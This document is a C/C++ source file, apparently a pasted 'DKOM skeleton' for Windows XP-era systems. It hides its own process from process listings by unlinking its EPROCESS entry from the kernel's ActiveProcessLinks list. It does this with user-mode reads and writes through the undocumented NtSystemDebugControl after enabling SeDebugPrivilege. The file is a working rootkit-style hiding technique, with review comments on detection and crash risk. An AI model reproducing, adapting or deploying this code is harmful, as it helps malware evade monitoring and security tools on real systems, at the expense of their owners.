
DKOM skeleton

  1. #define WIN32_LEAN_AND_MEAN
  2. #include <windows.h>
  3. #include <stdio.h>
  4. #include <shlwapi.h>
  5. #pragma comment (lib, "ntdll.lib")
  6. #pragma comment (lib, "advapi32.lib")
  7.  
typedef LONG NTSTATUS;

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
// Request classes for NtSystemDebugControl (ivanlef0u's code).
// The hex numbers in the comments are the size, in bytes, of the struct to pass
// as the input buffer for that class, as observed on XP SP2 ntoskrnl 5.1.2600.
// Only DebugSysReadVirtual and DebugSysWriteVirtual are used in this file.
// NOTE(review): the virtual read/write classes are reportedly refused by the
// kernel on XP SP2 and later unless a kernel debugger is enabled - confirm
// against the target build; where refused, callers below see a non-success
// status on the very first request and bail out.
typedef enum _DEBUG_CONTROL_CODE {
    DebugSysGetTraceInformation=1,
    DebugSysSetInternalBreakpoint, //0x38
    DebugSysSetSpecialCall, //0x4
    DebugSysClerSpecialCalls,  //no args, removes every special call
    DebugSysQuerySpecialCalls,
    DebugSysBreakpointWithStatus,
    DebugSysGetVersion, //0x28

    // Values 8..11 come from the ReactOS sources (ntexapi.h), written by our
    // favourite Alex Ionescu.
    DebugSysReadVirtual = 8, //0x10
    DebugSysWriteVirtual = 9,
    DebugSysReadPhysical = 10,
    DebugSysWritePhysical = 11,

    DebugSysReadControlSpace=12, //0x18
    DebugSysWriteControlSpace, //0x18
    DebugSysReadIoSpace, //0x20
    DebugSysSysWriteIoSpace, //0x20
    DebugSysReadMsr, //0x10
    DebugSysWriteMsr, //0x10
    DebugSysReadBusData, //0x18
    DebugSysWriteBusData, //0x18
    DebugSysCheckLowMemory,
} DEBUG_CONTROL_CODE;

// Input buffer for DebugSysReadVirtual / DebugSysWriteVirtual (0x10 bytes above).
//   Address - kernel virtual address to read from or write to
//   Buffer  - user-mode buffer that receives (read) or supplies (write) the bytes
//   Request - byte count to transfer; sizeof(ULONG) everywhere in this file
typedef struct _SYSDBG_VIRTUAL {
    PVOID Address;
    PVOID Buffer;
    ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;

// Undocumented ntdll export, resolved through ntdll.lib (see the #pragma above).
// Declared as returning ULONG here; the callers compare it with STATUS_SUCCESS.
extern "C"
__declspec(dllimport)
ULONG
__stdcall
NtSystemDebugControl(
    DEBUG_CONTROL_CODE ControlCode,
    PVOID InputBuffer,
    ULONG InputBufferLength,
    PVOID OutputBuffer,
    ULONG OutputBufferLength,
    PULONG ReturnLength
);

// Declared for status-to-Win32-error translation but not called anywhere in
// this file.
extern "C"
__declspec(dllimport)
ULONG
__stdcall
RtlNtStatusToDosError(
  NTSTATUS Status
);

// Assumed fixed 32-bit address of the processor control region (what fs:[0]
// points to in kernel land); HideCurrentProcess uses it as the root for the
// current-thread lookup. x86 only - not valid on 64-bit builds.
#define PKPCR 0xffdff000 // <=> fs:[0] in KeLand
  67.  
  68. //FUNCTIONS:
  69.  
  70. //Check OS and get the right Offset:
// Map the running OS version to the EPROCESS offset this tool uses.
// Sets Offset and returns 1 for the three versions in the table below;
// returns 0 and leaves Offset untouched for anything else, including
// non-NT platforms. The GetVersionEx return value is not checked (as in
// xWeasel's original): a failed query leaves the zeroed struct, which
// matches no table row and yields 0.
int CheckOSVersion( int &Offset )
{
    // (major, minor) -> offset, NT platform only.
    static const struct { DWORD Major; DWORD Minor; int Value; } Known[] = {
        { 5, 1, 0x88 }, // WinXP
        { 5, 0, 0xA0 }, // Win2000
        { 6, 0, 0xA0 }, // VISTA
    };

    OSVERSIONINFO Version = { 0 };
    Version.dwOSVersionInfoSize = sizeof(Version);
    GetVersionEx(&Version);

    if(Version.dwPlatformId != VER_PLATFORM_WIN32_NT)
    {
        return 0;
    }

    for(size_t i = 0; i < sizeof(Known) / sizeof(Known[0]); i++)
    {
        if(Version.dwMajorVersion == Known[i].Major && Version.dwMinorVersion == Known[i].Minor)
        {
            Offset = Known[i].Value;
            return 1;
        }
    }

    return 0;
}
  101.  
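// Enable one named privilege (e.g. "SeDebugPrivilege") on the current
// process token. Returns 1 on success, 0 on any failure.
//
// The privilege must already be present (disabled) in the token; this only
// flips its enabled bit. A token that does not hold it (non-admin, or a
// filtered token) makes AdjustTokenPrivileges succeed while setting
// ERROR_NOT_ALL_ASSIGNED, so that case is checked explicitly and reported
// as failure - the original returned 1 there and the caller then issued
// kernel requests that could not succeed.
ULONG EnablePrivilege(char *Privilege)
{
    HANDLE hToken = NULL;   // was uninitialised: CloseHandle ran on garbage when OpenProcessToken failed
    ULONG Ret = 0;
    TOKEN_PRIVILEGES TP;

    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        return 0;           // no handle acquired, nothing to close
    }

    if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
    {
        goto bye;
    }

    TP.PrivilegeCount = 1;
    TP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if(!AdjustTokenPrivileges(hToken, FALSE, &TP, 0, NULL, NULL))
    {
        goto bye;
    }

    // Non-zero return but the privilege is absent from the token.
    if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        goto bye;
    }

    Ret = 1;

bye:
    CloseHandle(hToken);
    return Ret;
}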
  142.  
// DKOM unlink of the calling process from the kernel's ActiveProcessLinks
// list, done from user mode through NtSystemDebugControl's virtual
// read/write classes (no driver). Four reads locate the neighbouring list
// entries, two writes splice them together. Returns 1 when every request
// reported STATUS_SUCCESS, 0 on the first failure - a failure between the
// two writes leaves the list half-edited.
//
// Offset: EPROCESS offset of ActiveProcessLinks (Flink) for the running OS,
// as chosen by CheckOSVersion. All kernel pointers are handled as 32-bit
// ULONGs; x86 only.
//
// NOTE(review): risk and detection. Only the list links are rewritten - the
// process object, its threads and its handle table are untouched - so a
// cross-view check (enumerating processes by thread or handle-table walk
// versus the ActiveProcessLinks walk) exposes the gap. A user-mode process
// enabling SeDebugPrivilege and then issuing DebugSysReadVirtual /
// DebugSysWriteVirtual is itself a high-signal event. The 0x220 and 0x8C
// offsets below are hard-coded while Offset is per-OS, so on the Win2000 and
// Vista branches the reads and the two writes can hit unrelated kernel
// memory - a crash risk rather than a silent no-op.
int HideCurrentProcess( int Offset )
{
    ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
    SYSDBG_VIRTUAL Mem;

    // The debug-control requests below are refused without this privilege.
    if(!EnablePrivilege("SeDebugPrivilege"))
    {  
        return 0;
    }

    /**************** CURRENT ETHREAD ****************/
    // Read 1: address of the running thread's KTHREAD (which heads the
    // ETHREAD) from the fixed KPCR; the result overwrites Addr.
    Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread    : Ptr32 _KTHREAD
    Mem.Buffer=&Addr;
    Mem.Request=sizeof(ULONG);

    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {  
        return 0;
    }

    /**************** CURRENT EPROCESS ****************/
    // Read 2: the owning EPROCESS of that thread. 0x220 is a hard-coded
    // (XP-layout) ETHREAD offset, not adjusted by Offset.
    Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
    Mem.Buffer=&Addr;
    Mem.Request=sizeof(ULONG);

    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {      
        return 0;
    }

    /**************** PREV EPROCESS ****************/
    // Read 3: ActiveProcessLinks.Blink (0x88 + 4 on XP) = address of the
    // previous entry's LIST_ENTRY. Hard-coded, unlike the Flink read below.
    Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&PrevEPROCESS;
    Mem.Request=sizeof(ULONG);

    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {      
        return 0;
    }

    /**************** NEXT EPROCESS ****************/
    // Read 4: ActiveProcessLinks.Flink at the per-OS Offset = address of the
    // next entry's LIST_ENTRY.
    Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&NextEPROCESS;
    Mem.Request=sizeof(ULONG);

    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {      
        return 0;
    }

    /**************** PREV EPROCESS TO NEXT EPROCESS ****************/
    // Write 1: prev->Flink = next. PrevEPROCESS is the address of the
    // previous LIST_ENTRY, whose first field is Flink, hence no +offset.
    Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&NextEPROCESS;
    Mem.Request=sizeof(ULONG);

    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {      
        return 0;
    }

    /**************** NEXT EPROCESS TO PREV EPROCESS ****************/
    // Write 2: next->Blink = prev (+0x4 selects the Blink field).
    // A failure here leaves prev->Flink already redirected (see header).
    Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&PrevEPROCESS;
    Mem.Request=sizeof(ULONG);

    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {      
        return 0;
    }

    // The current process's own Flink/Blink are left as they were.
    return 1; //SUCCED Stuff is hidden!!
}
  221.  
  222. //MAIN FUNCTION
  223.  
// Entry point: shows a debug box, resolves the per-OS offset and, when the
// OS is one CheckOSVersion knows, runs the unlink. HideCurrentProcess's
// return value is not inspected - the "FOUND!" box is shown either way.
// Always returns 0.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG

    int Offset = 0;
    if ( CheckOSVersion(Offset) != 1)
    {
        return 0;   // unrecognised OS: nothing attempted
    }

    HideCurrentProcess(Offset);//OK to hide
    MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG

    return 0;
}